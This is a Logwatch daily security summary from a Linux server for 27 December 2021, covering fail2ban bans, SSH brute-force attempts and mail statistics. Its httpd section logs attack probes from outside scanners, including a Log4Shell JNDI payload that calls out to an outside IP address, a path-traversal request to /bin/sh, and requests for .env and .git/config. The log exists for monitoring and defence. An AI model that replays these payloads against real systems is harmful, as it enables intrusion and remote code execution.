################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Tue Dec 28 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-27 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host:
h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 28:28 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 9 sites probed the server
Requests with error response codes
400 Bad Request
null: 21 Time(s)
1.1: 4 Time(s)
/: 3 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s)
/socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... VMjgVRwttl6AAAC: 2 Time(s)
http://fuwu.sogou.com/404/index.html: 2 Time(s)
/.env: 1 Time(s)
/0bef: 1 Time(s)
/manager/html: 1 Time(s)
4~: 1 Time(s)
404 Not Found
//2019/wp-includes/wlwmanifest.xml: 2 Time(s)
//blog/wp-includes/wlwmanifest.xml: 2 Time(s)
//cms/wp-includes/wlwmanifest.xml: 2 Time(s)
//news/wp-includes/wlwmanifest.xml: 2 Time(s)
//shop/wp-includes/wlwmanifest.xml: 2 Time(s)
//site/wp-includes/wlwmanifest.xml: 2 Time(s)
//sito/wp-includes/wlwmanifest.xml: 2 Time(s)
//test/wp-includes/wlwmanifest.xml: 2 Time(s)
//web/wp-includes/wlwmanifest.xml: 2 Time(s)
//website/wp-includes/wlwmanifest.xml: 2 Time(s)
//wordpress/wp-includes/wlwmanifest.xml: 2 Time(s)
//wp-includes/wlwmanifest.xml: 2 Time(s)
//wp/wp-includes/wlwmanifest.xml: 2 Time(s)
//wp1/wp-includes/wlwmanifest.xml: 2 Time(s)
//wp2/wp-includes/wlwmanifest.xml: 2 Time(s)
//xmlrpc.php?rsd: 2 Time(s)
//2018/wp-includes/wlwmanifest.xml: 1 Time(s)
//2020/wp-includes/wlwmanifest.xml: 1 Time(s)
//media/wp-includes/wlwmanifest.xml: 1 Time(s)
500 Internal Server Error
/.env: 21 Time(s)
/: 17 Time(s)
/console/: 2 Time(s)
/mifs/.;/services/LogService: 2 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
/.git/config: 1 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/HNAP1: 1 Time(s)
/_ignition/execute-solution: 1 Time(s)
/actuator/health: 1 Time(s)
/dns-query?dns=AeYBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE: 1 Time(s)
/dns-query?dns=nKYBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE: 1 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 1 Time(s)
/evox/about: 1 Time(s)
/favicon.ico: 1 Time(s)
/index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
/level/15/exec/-/sh/run/CR: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/sdk: 1 Time(s)
/text4041640632818: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
unknown (snf-22770.ok-kno.grnetcloud.net): 41 Time(s)
root (net-2-45-185-2.cust.vodafonedsl.it): 32 Time(s)
root (165.22.120.146): 30 Time(s)
unknown (net-2-45-185-2.cust.vodafonedsl.it): 18 Time(s)
unknown (165.22.120.146): 17 Time(s)
root (211.45.247.122): 16 Time(s)
root (222.185.231.246): 16 Time(s)
root (125.46.81.106): 12 Time(s)
root (106.51.80.198): 9 Time(s)
root (210.22.128.214): 9 Time(s)
root (snf-22770.ok-kno.grnetcloud.net): 9 Time(s)
unknown (211.45.247.122): 9 Time(s)
root (104.244.77.235): 6 Time(s)
root (104.244.78.168): 6 Time(s)
root (185.220.101.152): 6 Time(s)
root (199.195.248.80): 6 Time(s)
root (81.17.18.58): 6 Time(s)
root (bras-base-plvlpq3500w-grc-02-70-49-126-223.dsl.bell.ca): 6 Time(s)
root (chelseamanning.tor-exit.calyxinstitute.org): 6 Time(s)
root (mariellefranco.tor-exit.calyxinstitute.org): 6 Time(s)
root (84.123.27.171.dyn.user.ono.com): 5 Time(s)
root (ua-85-229-243-210.bbcust.telenor.se): 5 Time(s)
unknown (210.22.128.214): 5 Time(s)
root (113.119.180.153): 4 Time(s)
unknown (111.93.214.67): 4 Time(s)
root (103.235.170.195): 3 Time(s)
root (212.64.75.189): 3 Time(s)
root (93-42-117-137.ip86.fastwebnet.it): 3 Time(s)
unknown (125.46.81.106): 3 Time(s)
unknown (212.64.75.189): 3 Time(s)
unknown (222.185.231.246): 3 Time(s)
root (111.93.214.67): 2 Time(s)
root (203.245.29.159): 2 Time(s)
unknown (106.51.80.198): 2 Time(s)
unknown (130.180.77.106): 2 Time(s)
unknown (host-79-37-231-134.retail.telecomitalia.it): 2 Time(s)
root (121.134.173.39): 1 Time(s)
root (165.232.92.225): 1 Time(s)
root (165.232.92.241): 1 Time(s)
root (222.186.153.230): 1 Time(s)
root (5.2.69.50): 1 Time(s)
root (5.2.72.124): 1 Time(s)
unknown (113.119.180.153): 1 Time(s)
unknown (121.134.173.39): 1 Time(s)
unknown (141.98.11.16): 1 Time(s)
unknown (58.246.251.27): 1 Time(s)
unknown (84.123.27.171.dyn.user.ono.com): 1 Time(s)
unknown (93-42-117-137.ip86.fastwebnet.it): 1 Time(s)
unknown (tor-bridge-nur.linkspartei.org): 1 Time(s)
unknown (ua-85-229-243-210.bbcust.telenor.se): 1 Time(s)
Invalid Users:
Unknown Account: 117 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
9.286K Bytes accepted 9,509
9.286K Bytes sent via SMTP 9,509
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
3 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
3 Total 4xx Rejects 100.00%
======== ==================================================
173 Connections
5 Connections lost (inbound)
173 Disconnections
1 Removed from queue
1 Sent via SMTP
3 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
root : 8 Time(s)
Failed logins from:
2.45.185.2 (net-2-45-185-2.cust.vodafonedsl.it): 32 times
5.2.69.50: 5 times
5.2.72.124: 3 times
70.49.126.223 (bras-base-plvlpq3500w-grc-02-70-49-126-223.dsl.bell.ca): 6 times
81.17.18.58 (block1-che.interlayer.co.uk): 6 times
83.212.79.250: 9 times
84.123.27.171 (84.123.27.171.dyn.user.ono.com): 5 times
85.229.243.210 (ua-85-229-243-210.bbcust.telenor.se): 5 times
93.42.117.137 (93-42-117-137.ip86.fastwebnet.it): 3 times
103.235.170.195: 3 times
104.244.77.235 (LuxembourgTor15.lu): 6 times
104.244.78.168 (LuxembourgTor47.lu): 6 times
106.51.80.198 (106.51.80.198.actcorp.in): 9 times
111.93.214.67 (static-67.214.93.111-tataidc.co.in): 2 times
113.119.180.153: 4 times
121.134.173.39: 1 time
125.46.81.106 (hn.kd.ny.adsl): 12 times
165.22.120.146: 30 times
165.232.92.225: 1 time
165.232.92.241: 1 time
185.220.101.152 (tor-exit-152.relayon.org): 6 times
185.220.103.5 (chelseamanning.tor-exit.calyxinstitute.org): 6 times
185.220.103.8 (mariellefranco.tor-exit.calyxinstitute.org): 6 times
199.195.248.80 (NewYorkTor11.us): 6 times
203.245.29.159: 2 times
210.22.128.214: 9 times
211.45.247.122: 16 times
212.64.75.189: 3 times
222.185.231.246: 16 times
222.186.153.230: 1 time
Illegal users from:
2001:470:1:332::2 (the-shadow-server-foundation.e0-1.core1.sfo2.he.net): 1 time
undef: 103 times
2.45.185.2 (net-2-45-185-2.cust.vodafonedsl.it): 18 times
58.246.251.27: 1 time
64.62.197.152: 1 time
79.37.231.134 (host-79-37-231-134.retail.telecomitalia.it): 2 times
83.212.79.250: 41 times
84.123.27.171 (84.123.27.171.dyn.user.ono.com): 1 time
85.229.243.210 (ua-85-229-243-210.bbcust.telenor.se): 1 time
93.42.117.137 (93-42-117-137.ip86.fastwebnet.it): 1 time
106.51.80.198 (106.51.80.198.actcorp.in): 2 times
111.93.214.67 (static-67.214.93.111-tataidc.co.in): 4 times
113.119.180.153: 1 time
121.134.173.39: 1 time
125.46.81.106 (hn.kd.ny.adsl): 3 times
130.180.77.106 (ex01.the-hadleys.de): 2 times
141.98.11.16: 1 time
152.89.107.127 (tor-bridge-nur.linkspartei.org): 1 time
165.22.120.146: 17 times
210.22.128.214: 5 times
211.45.247.122: 9 times
212.64.75.189: 3 times
222.185.231.246: 3 times
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################